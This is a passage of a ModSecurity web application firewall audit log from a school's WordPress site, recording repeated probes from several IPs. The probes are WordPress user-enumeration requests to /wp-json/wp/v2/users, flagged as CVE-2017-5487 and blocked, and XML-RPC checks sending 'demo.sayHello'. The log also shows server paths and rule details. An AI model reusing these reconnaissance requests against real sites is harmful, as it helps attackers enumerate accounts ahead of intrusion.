OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dcbc903-Z-- --72ec7907-A-- [17/May/2025:22:39:03 +0700] aCitlxKi5m5upc8uMd4XRQAAAMk 103.236.140.4 38036 103.236.140.4 8181 --72ec7907-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --72ec7907-C-- demo.sayHello --72ec7907-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --72ec7907-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496343897880 5641 (- - -) Stopwatch2: 1747496343897880 5641; combined=4137, p1=546, p2=3370, p3=32, p4=34, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72ec7907-Z-- --8308e025-A-- [17/May/2025:22:39:57 +0700] aCitzRKi5m5upc8uMd4XfwAAANc 103.236.140.4 38818 103.236.140.4 8181 --8308e025-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8308e025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8308e025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496397143194 3480 (- - -) Stopwatch2: 1747496397143194 3480; combined=1475, p1=478, p2=960, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8308e025-Z-- --4d59a811-A-- [17/May/2025:22:40:05 +0700] aCit1QTOsBn9MSWb6WLRXgAAAJE 103.236.140.4 38894 103.236.140.4 8181 --4d59a811-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d59a811-C-- demo.sayHello --4d59a811-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d59a811-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496405227054 5563 (- - -) Stopwatch2: 1747496405227054 5563; combined=4111, p1=543, p2=3343, p3=31, p4=36, p5=93, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d59a811-Z-- --b0c5ee69-A-- [17/May/2025:22:40:36 +0700] aCit9Om4kjNN-hEbWjKhJQAAAFg 103.236.140.4 39218 103.236.140.4 8181 --b0c5ee69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0c5ee69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0c5ee69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496436916383 2734 (- - -) Stopwatch2: 1747496436916383 2734; combined=1237, p1=430, p2=777, p3=0, p4=0, p5=29, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0c5ee69-Z-- --798a1b26-A-- [17/May/2025:22:40:46 +0700] aCit_gTOsBn9MSWb6WLRdgAAAIQ 103.236.140.4 39358 103.236.140.4 8181 --798a1b26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --798a1b26-C-- demo.sayHello --798a1b26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --798a1b26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496446969498 5629 (- - -) Stopwatch2: 1747496446969498 5629; combined=4184, p1=529, p2=3426, p3=32, p4=36, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --798a1b26-Z-- --a88f1d5e-A-- [17/May/2025:22:42:48 +0700] aCiueHyxdQCiyU1ENFegdgAAAAk 103.236.140.4 40574 103.236.140.4 8181 --a88f1d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a88f1d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a88f1d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496568952602 2765 (- - -) Stopwatch2: 1747496568952602 2765; combined=1262, p1=409, p2=823, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a88f1d5e-Z-- --4f35f677-A-- [17/May/2025:22:42:50 +0700] aCiuenyxdQCiyU1ENFegeQAAABY 103.236.140.4 40584 103.236.140.4 8181 --4f35f677-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f35f677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f35f677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496570243181 2766 (- - -) Stopwatch2: 1747496570243181 2766; combined=1233, p1=413, p2=791, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f35f677-Z-- --cff9b97b-A-- [17/May/2025:22:42:56 +0700] aCiugBKi5m5upc8uMd4XtgAAAMU 103.236.140.4 40678 103.236.140.4 8181 --cff9b97b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cff9b97b-C-- demo.sayHello --cff9b97b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff9b97b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496576469664 5462 (- - -) Stopwatch2: 1747496576469664 5462; combined=4184, p1=591, p2=3380, p3=31, p4=35, p5=87, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff9b97b-Z-- --5dbf5778-A-- [17/May/2025:22:42:58 +0700] aCiugnyxdQCiyU1ENFegjgAAABU 103.236.140.4 40708 103.236.140.4 8181 --5dbf5778-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dbf5778-C-- demo.sayHello --5dbf5778-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbf5778-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496578507800 5756 (- - -) Stopwatch2: 1747496578507800 5756; combined=4201, p1=547, p2=3429, p3=33, p4=36, p5=93, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbf5778-Z-- --2776016b-A-- [17/May/2025:22:43:40 +0700] aCiurHyxdQCiyU1ENFegqAAAABU 103.236.140.4 41038 103.236.140.4 8181 --2776016b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2776016b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2776016b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496620756734 2827 (- - -) Stopwatch2: 1747496620756734 2827; combined=1231, p1=443, p2=760, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2776016b-Z-- --a9355c1c-A-- [17/May/2025:22:43:48 +0700] aCiutHyxdQCiyU1ENFegrQAAAAg 103.236.140.4 41074 103.236.140.4 8181 --a9355c1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9355c1c-C-- demo.sayHello --a9355c1c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9355c1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496628962781 5491 (- - -) Stopwatch2: 1747496628962781 5491; combined=3995, p1=540, p2=3240, p3=29, p4=31, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9355c1c-Z-- --03b11166-A-- [17/May/2025:22:44:05 +0700] aCiuxXyxdQCiyU1ENFegtgAAABU 103.236.140.4 41106 103.236.140.4 8181 --03b11166-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03b11166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b11166-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496645054030 2860 (- - -) Stopwatch2: 1747496645054030 2860; combined=1294, p1=435, p2=830, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b11166-Z-- --3370cb05-A-- [17/May/2025:22:44:12 +0700] aCiuzHyxdQCiyU1ENFeguQAAABc 103.236.140.4 41112 103.236.140.4 8181 --3370cb05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3370cb05-C-- demo.sayHello --3370cb05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3370cb05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496652387212 6003 (- - -) Stopwatch2: 1747496652387212 6003; combined=4407, p1=570, p2=3611, p3=35, p4=35, p5=93, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3370cb05-Z-- --80cced0a-A-- [17/May/2025:22:44:14 +0700] aCiuznyxdQCiyU1ENFegugAAAAk 103.236.140.4 41114 103.236.140.4 8181 --80cced0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80cced0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80cced0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496654326163 2669 (- - -) Stopwatch2: 1747496654326163 2669; combined=1264, p1=435, p2=791, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80cced0a-Z-- --68e2d52c-A-- [17/May/2025:22:44:20 +0700] aCiu1HyxdQCiyU1ENFegwAAAAA0 103.236.140.4 41136 103.236.140.4 8181 --68e2d52c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68e2d52c-C-- demo.sayHello --68e2d52c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e2d52c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496660798105 5943 (- - -) Stopwatch2: 1747496660798105 5943; combined=4388, p1=541, p2=3619, p3=34, p4=36, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e2d52c-Z-- --640ead13-A-- [17/May/2025:22:45:02 +0700] aCiu_nyxdQCiyU1ENFeg8wAAAA4 103.236.140.4 41500 103.236.140.4 8181 --640ead13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --640ead13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --640ead13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496702168126 2730 (- - -) Stopwatch2: 1747496702168126 2730; combined=1212, p1=453, p2=731, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --640ead13-Z-- --86f52f20-A-- [17/May/2025:22:45:12 +0700] aCivCHyxdQCiyU1ENFehBQAAAAQ 103.236.140.4 41584 103.236.140.4 8181 --86f52f20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86f52f20-C-- demo.sayHello --86f52f20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f52f20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 